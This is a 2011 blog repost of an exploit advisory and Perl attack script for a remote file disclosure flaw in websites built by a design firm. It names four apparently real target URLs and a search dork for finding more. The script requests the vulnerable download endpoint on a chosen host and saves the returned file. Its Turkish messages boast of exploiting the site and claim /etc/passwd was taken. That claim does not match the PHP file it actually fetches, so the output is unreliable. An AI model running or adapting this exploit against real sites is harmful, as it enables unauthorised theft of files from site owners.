28 Nisan 2011 Perşembe

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : design by Shackleton Rollin
|~Price : N/A
|~Version : N/A
|~Vulnerability Style :  file disclosure
|~Vulnerability Dir : /
|~Google Keyword : "Website design by Shackleton Rollin" © Joanna Hall 2011
|[~]Date : "29.04.2011"
|[~]Tested on :
DEMOS
----------------------------------------------------------
process.filedownload.php <= 'filename' Functions Not Security
---------------------------------------------------------
Demos
www.walknow.co.uk/process.filedownload.php?filename=z_WALKING_TIMES_DATA.php
www.carbcurfew.co.uk/process.filedownload.php?filename=z_WALKING_TIMES_DATA.php
www.joannahall.com/process.filedownload.php?filename=z_WALKING_TIMES_DATA.php
www.joannahallonline.co.uk/process.filedownload.php?filename=z_WALKING_TIMES_DATA.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    =============== DISCLOSURE.PL =================================================
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title Shackleton Rollin - Remote File Disclosure Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. \n\n";
&help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 HedefWeb /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* Shackleton Rollin - Remote File Disclosure Exploit              *\n";
print "\* Exploited By : KnocKout                                                  *\n";
print "\* Contact :   knockoutr[at]msn[dot]com                                 *\n";
print "\* --                                    *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="process.filedownload.php?filename=z_WALKING_TIMES_DATA.php";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Az Bekle Sikertiyorum!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "z_WALKING_TIMES_DATA.php");
if ($request->is_success)
{
print "[+] $url <= Hedef Site Exploit Edildi!\n\n";
print "[+] OPERASYON TAMAM !\n";
print "[+] etc/passwd Dosyasi Indirildi (z_WALKING_TIMES_DATA.php)\n";
print "[+] GRAYHATZ STAR \n";
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....
 \n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}
 
 
 
    ================================================================

Hiç yorum yok:

Yorum Gönder